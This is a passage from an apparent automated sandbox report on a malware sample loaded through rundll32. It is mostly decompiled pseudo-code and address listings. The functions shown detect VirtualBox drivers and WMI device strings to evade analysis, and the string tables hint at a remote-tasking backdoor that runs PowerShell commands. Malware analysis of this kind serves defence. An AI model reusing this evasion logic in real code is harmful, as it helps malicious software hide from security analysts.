                0x285c805bb38
                0x285c805bb47
                0x285c805bb4e
                0x285c805bb55
                0x285c805bb5b
                0x285c805bb62
                0x285c805bb68
                0x285c805bb6f
                0x285c805bb75
                0x285c805bb7c
                0x285c805bb81
                0x285c805bb86
                0x285c805bb8f
                0x285c805bb91
                0x285c805bb96
                0x285c805bb9d
                0x285c805bba4
                0x285c805bbab
                0x285c805bbb2
                0x285c805bbb7
                0x285c805bbbd
                0x285c805bbc0
                0x285c805bbc7
                0x285c805bbce
                0x285c805bbd3
                0x285c805bbd7
                0x285c805bbdb
                0x285c805bbe3
                0x285c805bbe7
                0x285c805bbeb
                0x285c805bbf8
                0x285c805bbfc
                0x285c805bc02
                0x285c805bc0a
                0x285c805bc11
                0x285c805bc1a
                0x285c805bc1e
                0x285c805bc28
                0x285c805bc2e
                0x285c805bc32
                0x285c805bc38
                0x285c805bc45
                0x285c805bc4a
                0x285c805bc51
                0x285c805bc56
                0x285c805bc58
                0x285c805bc5d
                0x285c805bc5e
                0x285c805bc65
                0x285c805bc67
                0x285c805bc6c
                0x285c805bc6d
                0x285c805bc74
                0x285c805bc76
                0x285c805bc7b
                0x285c805bc80
                0x285c805bc82
                0x285c805bc87
                0x285c805bc8b
                0x285c805bc90
                0x285c805bc98
                0x285c805bc9c
                0x285c805bca0
                0x285c805bcab
                0x285c805bcb0
                0x285c805bcba
                0x285c805bcbf
                0x285c805bcc1
                0x285c805bcc6
                0x285c805bcc7
                0x285c805bcce
                0x285c805bcd0
                0x285c805bcd5
                0x285c805bcd6
                0x285c805bcdd
                0x285c805bcdf
                0x285c805bce4
                0x285c805bce9
                0x285c805bceb
                0x285c805bcf0
                0x285c805bcf4
                0x285c805bcf9
                0x285c805bd04
                0x285c805bd0b
                0x285c805bd12
                0x285c805bd1f
                0x285c805bd23
                0x285c805bd2c
                0x285c805bd2f
                0x285c805bd36
                0x285c805bd3a
                0x285c805bd3f
                0x285c805bd4c
                0x285c805bd50
                0x285c805bd55
                0x285c805bd5b
                0x285c805bd5d
                0x285c805bd6a
                0x285c805bd6c
                0x285c805bd79
                0x285c805bd7e
                0x285c805bd81
                0x285c805bd89
                0x285c805bd95
                0x285c805bd9e
                0x285c805bda5
                0x285c805bdaa
                0x285c805bdb1
                0x285c805bdb6
                0x285c805bdbd
                0x285c805bdc4
                0x285c805bdcb
                0x285c805bdcf
                0x285c805bdf0
                0x285c805bdf5
                0x285c805bdf9
                0x285c805be00
                0x285c805be05
                0x285c805be10
                0x285c805be15
                0x285c805be1f
                0x285c805be24
                0x285c805be26
                0x285c805be2b
                0x285c805be2c
                0x285c805be33
                0x285c805be35
                0x285c805be3a
                0x285c805be3b
                0x285c805be42
                0x285c805be44
                0x285c805be49
                0x285c805be4e
                0x285c805be50
                0x285c805be55
                0x285c805be59
                0x285c805be5e
                0x285c805be67
                0x285c805be6c
                0x285c805be71
                0x285c805be80
                0x285c805be87
                0x285c805be8f
                0x285c805be94
                0x285c805be9b
                0x285c805bea0
                0x285c805bea2
                0x285c805bea7
                0x285c805bea8
                0x285c805beaf
                0x285c805beb1
                0x285c805beb6
                0x285c805beb7
                0x285c805bebe
                0x285c805bec0
                0x285c805bec5
                0x285c805beca
                0x285c805becc
                0x285c805bed1
                0x285c805bed5
                0x285c805beda
                0x285c805bee2
                0x285c805bee6
                0x285c805bef4
                0x285c805bf2d
                0x285c805bf32
                0x285c805bf35
                0x285c805bf3d
                0x285c805bf44
                0x285c805bf4c
                0x285c805bf51
                0x285c805bf58
                0x285c805bf5d
                0x285c805bf5f
                0x285c805bf64
                0x285c805bf65
                0x285c805bf6c
                0x285c805bf6e
                0x285c805bf73
                0x285c805bf74
                0x285c805bf7b
                0x285c805bf7d
                0x285c805bf82
                0x285c805bf87
                0x285c805bf89
                0x285c805bf8e
                0x285c805bf92
                0x285c805bf97
                0x285c805bf9f
                0x285c805bfa3
                0x285c805bfa7
                0x285c805bfae
                0x285c805bfb4
                0x285c805bfbb
                0x285c805bfc1
                0x285c805bfd0
                0x285c805bfd6
                0x285c805bfda
                0x285c805bfe0
                0x285c805bfe7
                0x285c805bfed
                0x285c805bff4
                0x285c805bffa
                0x285c805c001
                0x285c805c007
                0x285c805c00e
                0x285c805c014
                0x285c805c01b
                0x285c805c021
                0x285c805c028
                0x285c805c02e
                0x285c805c035
                0x285c805c03b
                0x285c805c042
                0x285c805c048
                0x285c805c04f
                0x285c805c055
                0x285c805c05c
                0x285c805c062
                0x285c805c074
                0x285c805c079
                0x285c805c07b
                0x285c805c080
                0x285c805c081
                0x285c805c086
                0x285c805c087
                0x285c805c08c
                0x285c805c08d
                0x285c805c093
                0x285c805c098
                0x285c805c099
                0x285c805c09e
                0x285c805c09f
                0x285c805c0a4
                0x285c805c0a5
                0x285c805c0ab
                0x285c805c0b2
                0x285c805c0d3

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$FolderPathSpecial$ProcessTerminateThreadUninitializelstrcat$CurrentInitializeThread32$CloseCreateFirstHandleNextObjectOpenSecuritySingleSnapshotToolhelp32Wait
                • String ID: -Recurse"$" -Force$127.0.0.1$; Remove-Item -Path "$Command : $Domain name: $User name: $\wab.exe$dex$dij$file_entry_point$gdt$iKInPE9WrB$ins$powershell$response_status$sdl$shi$task$task_data$task_id$tasks
                • API String ID: 3213461338-3323971348
                • Opcode ID: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction ID: de8b85655ce9ef5537560a95cc3666cb4d6fc366c3e244ebb60c1fbca4a3f89a
                • Opcode Fuzzy Hash: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction Fuzzy Hash: 1B13BE2A212FE0D9EB20DF70D8593ED23A1F741388F409523DA5967ADADF78C648CB14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809D4D0 Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 139COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 55%
                			E00000285285C809D4D0(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
				signed char _t67;
				void* _t83;
				void* _t87;
				signed long long _t100;
				signed long long _t121;
				void* _t142;
				signed long long _t147;
				WCHAR* _t152;
				void* _t153;
				void* _t155;
				signed long long _t156;
				void* _t158;

				_t147 = __rdi;
				_t75 = __ecx;
				 *((long long*)(_t155 + 8)) = __rbx;
				 *((long long*)(_t155 + 0x10)) = __rsi;
				 *((long long*)(_t155 + 0x18)) = __rdi;
				_t153 = _t155 - 0x5f0;
				_t156 = _t155 - 0x6f0;
				_t100 =  *0xc814c720; // 0xee50a592130
				 *(_t153 + 0x5e0) = _t100 ^ _t156;
				 *((long long*)(_t156 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
				r8d = 0x208;
				 *((long long*)(_t156 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
				 *((long long*)(_t156 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
				 *((long long*)(_t156 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
				 *((long long*)(_t156 + 0x50)) = L"System32\\vboxdisp.dll";
				 *((long long*)(_t156 + 0x58)) = L"System32\\vboxhook.dll";
				 *((long long*)(_t156 + 0x60)) = L"System32\\vboxmrxnp.dll";
				 *((long long*)(_t156 + 0x68)) = L"System32\\vboxogl.dll";
				 *((long long*)(_t156 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
				 *((long long*)(_t156 + 0x78)) = L"System32\\vboxoglcrutil.dll";
				 *((long long*)(_t153 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
				 *((long long*)(_t153 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
				 *((long long*)(_t153 - 0x70)) = L"System32\\vboxoglpackspu.dll";
				 *((long long*)(_t153 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
				 *((long long*)(_t153 - 0x60)) = L"System32\\vboxservice.exe";
				 *((long long*)(_t153 - 0x58)) = L"System32\\vboxtray.exe";
				 *((long long*)(_t153 - 0x50)) = L"System32\\VBoxControl.exe";
				E00000285285C80C8EF0(__ecx, 0, _t83, _t87, _t153 + 0x1d0, _t142, __rdi, _t158);
				r8d = 0x208;
				E00000285285C80C8EF0(_t75, 0, _t83, _t87, _t153 - 0x40, _t142, _t147, _t158);
				 *(_t156 + 0x28) = _t147;
				GetWindowsDirectoryW(_t152);
				if (E00000285285C80A00A0() == 0) goto 0xc809d617;
				__imp__Wow64DisableWow64FsRedirection();
				_t121 = _t147;
				__imp__PathCombineW();
				r8d = 0x200;
				E00000285285C80C8EF0(_t75, 0, 0, _t87, _t153 + 0x3e0, _t153 + 0x1d0, _t147,  *((intOrPtr*)(_t156 + 0x30 + _t121 * 8)));
				E00000285285C809D1D0(_t75, L"System32\\VBoxControl.exe", _t153 + 0x3e0, _t153 + 0x1d0, L"Checking file %s ", _t153 - 0x40);
				_t67 = GetFileAttributesW(??); // executed
				if (_t67 == 0xffffffff) goto 0xc809d679;
				if ((_t67 & 0x00000010) == 0) goto 0xc809d684;
				if (_t121 + 1 - 0x11 < 0) goto 0xc809d620;
				goto 0xc809d689;
				 *((intOrPtr*)(_t156 + 0x20)) = 0;
				if ( *0xc814e430 == 8) goto 0xc809d6b2;
				if (1 - 0x1e < 0) goto 0xc809d6a0;
				goto 0xc809d711;
				if ( *0x285C814E484 == dil) goto 0xc809d711;
				if ( *0xc814e430 == 8) goto 0xc809d6da;
				if (1 - 0x1e < 0) goto 0xc809d6c8;
				goto 0xc809d6ef;
				if ( *0x285C814E46C == dil) goto 0xc809d6ef;
				GetCurrentProcess();
				 *((long long*)( *0x285C814E488))();
				if ( *((intOrPtr*)(_t156 + 0x20)) == 0) goto 0xc809d711;
				__imp__Wow64RevertWow64FsRedirection();
				return E00000285285C80C59D0(1,  *(_t153 + 0x5e0) ^ _t156, _t156 + 0x20, _t153 - 0x40);
			}















                0x285c809d4d0
                0x285c809d4d0
                0x285c809d4d0
                0x285c809d4d5
                0x285c809d4da
                0x285c809d4e0
                0x285c809d4e8
                0x285c809d4ef
                0x285c809d4f9
                0x285c809d509
                0x285c809d51c
                0x285c809d522
                0x285c809d52e
                0x285c809d53a
                0x285c809d546
                0x285c809d552
                0x285c809d55e
                0x285c809d56a
                0x285c809d576
                0x285c809d582
                0x285c809d58e
                0x285c809d599
                0x285c809d5a4
                0x285c809d5af
                0x285c809d5ba
                0x285c809d5c5
                0x285c809d5d0
                0x285c809d5d4
                0x285c809d5df
                0x285c809d5e5
                0x285c809d5f8
                0x285c809d5fd
                0x285c809d60a
                0x285c809d611
                0x285c809d619
                0x285c809d630
                0x285c809d63f
                0x285c809d645
                0x285c809d661
                0x285c809d66a
                0x285c809d673
                0x285c809d677
                0x285c809d680
                0x285c809d682
                0x285c809d690
                0x285c809d6a3
                0x285c809d6ae
                0x285c809d6b0
                0x285c809d6c1
                0x285c809d6cb
                0x285c809d6d6
                0x285c809d6d8
                0x285c809d6e8
                0x285c809d6ef
                0x285c809d6fd
                0x285c809d704
                0x285c809d70b
                0x285c809d73a

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                • API String ID: 2137468328-1036852472
                • Opcode ID: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction ID: e93811a8e085996fd56fc3ec57e9e7e56fa441ac3ce85551b00dc6d3de6a61f0
                • Opcode Fuzzy Hash: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction Fuzzy Hash: A9616C3A612FA099EB10CF14E8482D9B3E5F784795F908227DA8D537A8EF3CC645CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809DCC0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 191memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 958 285c809dcc0-285c809dd22 call 285c80a0410 961 285c809dd28-285c809dd68 SysAllocString * 2 958->961 962 285c809dfcb-285c809dfce 958->962 964 285c809ddc0-285c809ddc3 961->964 965 285c809dd6a-285c809dd6d 961->965 963 285c809dfb2-285c809dfca call 285c80c59d0 962->963 967 285c809ddce-285c809ddd0 964->967 968 285c809ddc5-285c809ddc8 SysFreeString 964->968 969 285c809dd6f-285c809dd8c 965->969 970 285c809ddb7-285c809ddba SysFreeString 965->970 972 285c809df97-285c809dfaa 967->972 973 285c809ddd6-285c809dde5 967->973 968->967 974 285c809dd96-285c809dd98 969->974 970->964 972->963 975 285c809df77-285c809df91 CoUninitialize 973->975 976 285c809ddeb 973->976 974->970 977 285c809dd9a-285c809ddb1 CoUninitialize 974->977 975->972 978 285c809ddf3-285c809ddf6 976->978 977->970 980 285c809df6f 978->980 981 285c809ddfc-285c809de1a 978->981 980->975 985 285c809de20-285c809de44 981->985 986 285c809df6b 981->986 990 285c809df52-285c809df63 985->990 991 285c809de4a-285c809de52 985->991 986->980 990->978 997 285c809df69 990->997 991->990 992 285c809de58-285c809de5a 991->992 993 285c809de60-285c809de73 StrCmpIW 992->993 994 285c809df48-285c809df4c VariantClear 992->994 993->994 996 285c809de79-285c809deb8 VariantClear SafeArrayAccessData 993->996 994->990 996->994 999 285c809debe-285c809deee SafeArrayGetLBound SafeArrayGetUBound 996->999 997->980 1000 285c809df3f-285c809df42 SafeArrayUnaccessData 999->1000 1001 285c809def0-285c809df08 SafeArrayGetElement 999->1001 1000->994 1002 285c809df10-285c809df1e call 285c80d19f0 1001->1002 1005 285c809df20-285c809df29 1002->1005 1006 285c809df39 1002->1006 1005->1002 1007 285c809df2b-285c809df35 1005->1007 1006->1000 1007->1001 1008 285c809df37 1007->1008 1008->1000
                C-Code - Quality: 24%
                			E00000285285C809DCC0(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
				void* _t80;
				void* _t81;
				signed char _t87;
				void* _t88;
				intOrPtr _t91;
				void* _t100;
				void* _t109;
				signed long long _t130;
				long long _t134;
				intOrPtr* _t153;
				long long _t189;
				void* _t191;
				void* _t192;
				signed long long _t193;
				long long _t203;
				void* _t207;

				_t189 = __rsi;
				_t191 = _t192 - 0x47;
				_t193 = _t192 - 0xb0;
				_t130 =  *0xc814c720; // 0xee50a592130
				 *(_t191 + 0x37) = _t130 ^ _t193;
				r12d = 0;
				 *((long long*)(_t191 + 0x1f)) = L"vboxvideo";
				 *((long long*)(_t191 - 0x21)) = _t203;
				 *((long long*)(_t191 + 0x27)) = L"VBoxVideoW8";
				_t134 = L"VBoxWddm";
				 *((long long*)(_t191 - 0x11)) = _t203;
				 *((long long*)(_t191 + 0x2f)) = _t134;
				r15d = r12d;
				 *((long long*)(_t191 - 0x29)) = _t203;
				_t81 = E00000285285C80A0410(_t80, _t191 - 0x21, _t191 - 0x11, __rsi); // executed
				if (_t81 == 0) goto 0xc809dfcb;
				 *((long long*)(_t193 + 0xd0)) = __rbx;
				 *((long long*)(_t193 + 0xd8)) = _t189;
				 *((long long*)(_t193 + 0xe0)) = __rdi;
				__imp__#2();
				__imp__#2();
				if (_t134 == 0) goto 0xc809ddc0;
				if (_t134 == 0) goto 0xc809ddb7;
				 *((long long*)(_t193 + 0x28)) = _t191 - 0x29;
				_t18 = _t203 + 0x30; // 0x30
				r9d = _t18;
				 *((long long*)(_t193 + 0x20)) = _t203;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0xa0))() >= 0) goto 0xc809ddb7;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (_t134 == 0) goto 0xc809ddce;
				__imp__#6();
				if (r12d == 0) goto 0xc809df97;
				_t153 =  *((intOrPtr*)(_t191 - 0x29));
				 *((long long*)(_t191 - 0x31)) = _t203;
				 *((intOrPtr*)(_t191 - 0x35)) = r12d;
				if (_t153 == 0) goto 0xc809df77;
				 *((long long*)(_t193 + 0xe8)) = __r14;
				if (r15d != 0) goto 0xc809df6f;
				 *((long long*)(_t193 + 0x20)) = _t191 - 0x35;
				_t32 = _t207 + 1; // 0x1, executed
				r8d = _t32;
				 *((intOrPtr*)( *_t153 + 0x20))();
				if ( *((intOrPtr*)(_t191 - 0x35)) == r12d) goto 0xc809df6b;
				 *((long long*)(_t193 + 0x28)) = _t203;
				r8d = 0;
				 *((long long*)(_t193 + 0x20)) = _t203;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))() < 0) goto 0xc809df52;
				_t87 =  *(_t191 - 9) & 0x0000ffff;
				if (_t87 == 1) goto 0xc809df52;
				if ((_t87 & 0x00000008) == 0) goto 0xc809df48;
				__imp__StrCmpIW();
				if (_t87 != 0) goto 0xc809df48;
				__imp__#9();
				 *((long long*)(_t193 + 0x28)) = _t203;
				r8d = 0;
				 *((long long*)(_t193 + 0x20)) = _t203;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))();
				__imp__#23();
				if (_t88 < 0) goto 0xc809df48;
				__imp__#20();
				__imp__#19();
				_t109 =  *((intOrPtr*)(_t191 - 0x19)) -  *((intOrPtr*)(_t191 - 0x15)) + 1;
				 *((intOrPtr*)(_t191 - 0x39)) = r12d;
				if (_t109 <= 0) goto 0xc809df3f;
				__imp__#25(); // executed
				if (E00000285285C80D19F0( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))),  *((intOrPtr*)(_t191 + 0xf)),  *((intOrPtr*)(_t191 + 0x1f))) == 0) goto 0xc809df39;
				if (r12d + 1 - 3 < 0) goto 0xc809df10;
				_t91 =  *((intOrPtr*)(_t191 - 0x39)) + 1;
				 *((intOrPtr*)(_t191 - 0x39)) = _t91;
				if (_t91 - _t109 < 0) goto 0xc809def0;
				goto 0xc809df3f;
				r15d = 1;
				__imp__#24();
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x10))();
				if ( *((intOrPtr*)(_t191 - 0x29)) != 0) goto 0xc809ddf3;
				goto 0xc809df6f;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x29)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				return E00000285285C80C59D0(_t100,  *(_t191 + 0x37) ^ _t193,  *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))), _t191 - 9);
			}



















                0x285c809dcc0
                0x285c809dcc6
                0x285c809dccb
                0x285c809dcd2
                0x285c809dcdc
                0x285c809dce0
                0x285c809dcea
                0x285c809dcf9
                0x285c809dcfd
                0x285c809dd05
                0x285c809dd0c
                0x285c809dd10
                0x285c809dd14
                0x285c809dd17
                0x285c809dd1b
                0x285c809dd22
                0x285c809dd28
                0x285c809dd37
                0x285c809dd3f
                0x285c809dd47
                0x285c809dd57
                0x285c809dd68
                0x285c809dd6d
                0x285c809dd77
                0x285c809dd7c
                0x285c809dd7c
                0x285c809dd84
                0x285c809dd98
                0x285c809dda4
                0x285c809ddae
                0x285c809ddb1
                0x285c809ddba
                0x285c809ddc3
                0x285c809ddc8
                0x285c809ddd0
                0x285c809ddd6
                0x285c809ddda
                0x285c809ddde
                0x285c809dde5
                0x285c809ddeb
                0x285c809ddf6
                0x285c809de03
                0x285c809de0f
                0x285c809de0f
                0x285c809de13
                0x285c809de1a
                0x285c809de28
                0x285c809de34
                0x285c809de37
                0x285c809de44
                0x285c809de4a
                0x285c809de52
                0x285c809de5a
                0x285c809de6b
                0x285c809de73
                0x285c809de7d
                0x285c809de8b
                0x285c809de97
                0x285c809de9a
                0x285c809dea2
                0x285c809deb0
                0x285c809deb8
                0x285c809dec9
                0x285c809deda
                0x285c809dee6
                0x285c809dee8
                0x285c809deee
                0x285c809defb
                0x285c809df1e
                0x285c809df29
                0x285c809df2e
                0x285c809df30
                0x285c809df35
                0x285c809df37
                0x285c809df39
                0x285c809df42
                0x285c809df4c
                0x285c809df59
                0x285c809df63
                0x285c809df69
                0x285c809df7a
                0x285c809df84
                0x285c809df8e
                0x285c809df91
                0x285c809dfca

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                • API String ID: 1020912672-1865646205
                • Opcode ID: ebca8437b3c2ed639850c6906fb2360f3bc395bfb2ef804b47d7745ce4c00649
                • Instruction ID: 3ce6876fc0b31ec93f8d48dca30af4625a2eb84ca57fc51852e23fc91a943a51
                • Opcode Fuzzy Hash: ebca8437b3c2ed639850c6906fb2360f3bc395bfb2ef804b47d7745ce4c00649
                • Instruction Fuzzy Hash: 1C91173A702F6486EB20CF65E45879C73B5F748B8AF408512DE5A67B58DF38C549CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C809EA60 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 181memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1019 285c809ea60-285c809ea8d call 285c80a0410 1022 285c809ece3-285c809eced 1019->1022 1023 285c809ea93-285c809ead3 SysAllocString * 2 1019->1023 1024 285c809ead5-285c809ead8 1023->1024 1025 285c809eb2a-285c809eb32 1023->1025 1026 285c809eb21-285c809eb24 SysFreeString 1024->1026 1027 285c809eada-285c809eaf6 1024->1027 1028 285c809eb3d-285c809eb4a 1025->1028 1029 285c809eb34-285c809eb37 SysFreeString 1025->1029 1026->1025 1034 285c809eb00-285c809eb02 1027->1034 1030 285c809eb50-285c809eb5f 1028->1030 1031 285c809ecd3-285c809ece2 1028->1031 1029->1028 1032 285c809ecb3-285c809eccd CoUninitialize 1030->1032 1033 285c809eb65-285c809eb6f 1030->1033 1032->1031 1035 285c809eb70-285c809eb83 1033->1035 1034->1026 1036 285c809eb04-285c809eb1b CoUninitialize 1034->1036 1038 285c809eb89-285c809eb8d 1035->1038 1036->1026 1040 285c809ecaf 1038->1040 1041 285c809eb93-285c809ebb7 1038->1041 1040->1032 1046 285c809ebe8-285c809ec0c 1041->1046 1047 285c809ebb9-285c809ebc1 1041->1047 1052 285c809ec3d-285c809ec61 1046->1052 1053 285c809ec0e-285c809ec16 1046->1053 1047->1046 1048 285c809ebc3-285c809ebc5 1047->1048 1050 285c809ebde-285c809ebe2 VariantClear 1048->1050 1051 285c809ebc7-285c809ebda call 285c80c9740 1048->1051 1050->1046 1051->1050 1061 285c809ec63-285c809ec6b 1052->1061 1062 285c809ec92-285c809ec9e 1052->1062 1053->1052 1055 285c809ec18-285c809ec1a 1053->1055 1057 285c809ec33-285c809ec37 VariantClear 1055->1057 1058 285c809ec1c-285c809ec2f call 285c80c9740 1055->1058 1057->1052 1058->1057 1061->1062 1064 285c809ec6d-285c809ec6f 1061->1064 1062->1040 1068 285c809eca0-285c809eca7 1062->1068 1066 285c809ec71-285c809ec84 call 285c80c9740 1064->1066 1067 285c809ec88-285c809ec8c VariantClear 1064->1067 1066->1067 1067->1062 1068->1035 1070 285c809ecad 1068->1070 1070->1032
                C-Code - Quality: 21%
                			E00000285285C809EA60(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed int _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t71;
				void* _t72;
				signed char _t78;
				signed char _t81;
				signed char _t84;
				void* _t94;
				void* _t128;
				intOrPtr* _t137;
				long long _t167;
				void* _t180;
				long long _t185;

				_t167 = __rsi;
				r15d = 0;
				_a32 = _t185;
				_v88 = _t185;
				_a24 = _t185;
				_t72 = E00000285285C80A0410(_t71,  &_a32,  &_v88, __rsi); // executed
				if (_t72 == 0) goto 0xc809ece3;
				_v32 = _t167;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xc809eb2a;
				if (__rax == 0) goto 0xc809eb21;
				_v96 =  &_a24;
				_t13 = _t185 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t185;
				_t179 =  *_a32;
				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0xc809eb21;
				r14d = r15d;
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xc809eb3d;
				__imp__#6();
				if (r14d == 0) goto 0xc809ecd3;
				_t137 = _a24;
				_a16 = _t185;
				_a8 = r15d;
				if (_t137 == 0) goto 0xc809ecb3;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t137 + 0x20))();
				if (_a8 == r15d) goto 0xc809ecaf;
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xc809ebe8;
				_t78 = _v80 & 0x0000ffff;
				if (_t78 == r12w) goto 0xc809ebe8;
				if ((_t78 & 0x00000008) == 0) goto 0xc809ebde;
				E00000285285C80C9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xc809ec3d;
				_t81 = _v80 & 0x0000ffff;
				if (_t81 == r12w) goto 0xc809ec3d;
				if ((_t81 & 0x00000008) == 0) goto 0xc809ec33;
				E00000285285C80C9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xc809ec92;
				_t84 = _v80 & 0x0000ffff;
				if (_t84 == r12w) goto 0xc809ec92;
				if ((_t84 & 0x00000008) == 0) goto 0xc809ec88;
				E00000285285C80C9740(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a16 + 0x10))();
				if (_t94 != 0) goto 0xc809ecaf;
				if (_a24 != 0) goto 0xc809eb70;
				goto 0xc809ecb3;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t94;
			}
























                0x285c809ea60
                0x285c809ea6c
                0x285c809ea77
                0x285c809ea7b
                0x285c809ea82
                0x285c809ea86
                0x285c809ea8d
                0x285c809ea93
                0x285c809ea9f
                0x285c809eaa4
                0x285c809eaa9
                0x285c809eaae
                0x285c809eabe
                0x285c809eac4
                0x285c809eacd
                0x285c809ead3
                0x285c809ead8
                0x285c809eae2
                0x285c809eae7
                0x285c809eae7
                0x285c809eaee
                0x285c809eaf6
                0x285c809eb02
                0x285c809eb08
                0x285c809eb0e
                0x285c809eb18
                0x285c809eb1b
                0x285c809eb24
                0x285c809eb32
                0x285c809eb37
                0x285c809eb4a
                0x285c809eb50
                0x285c809eb54
                0x285c809eb58
                0x285c809eb5f
                0x285c809eb65
                0x285c809eb77
                0x285c809eb83
                0x285c809eb86
                0x285c809eb8d
                0x285c809eb9b
                0x285c809eba7
                0x285c809ebaa
                0x285c809ebb7
                0x285c809ebb9
                0x285c809ebc1
                0x285c809ebc5
                0x285c809ebd2
                0x285c809ebda
                0x285c809ebe2
                0x285c809ebf0
                0x285c809ebfc
                0x285c809ebff
                0x285c809ec0c
                0x285c809ec0e
                0x285c809ec16
                0x285c809ec1a
                0x285c809ec27
